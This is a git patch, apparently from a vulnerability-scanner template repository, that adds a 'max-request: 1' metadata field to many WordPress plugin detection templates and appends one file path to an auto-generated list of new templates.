--git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From c8c8b19b98467b5a3ea18e3fd1c6a43df0becce2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 05:03:20 +0000 Subject: [PATCH 443/609] Auto Generated New Template Addition List [Fri Jul 7 05:03:20 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 69288206dd..7f01f691f0 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/exposed-panels/shell-box.yaml http/exposed-panels/untangle-admin-login.yaml http/exposed-panels/uptime-kuma-panel.yaml http/exposures/configs/collibra-properties.yaml +http/exposures/files/pnpm-lock.yaml 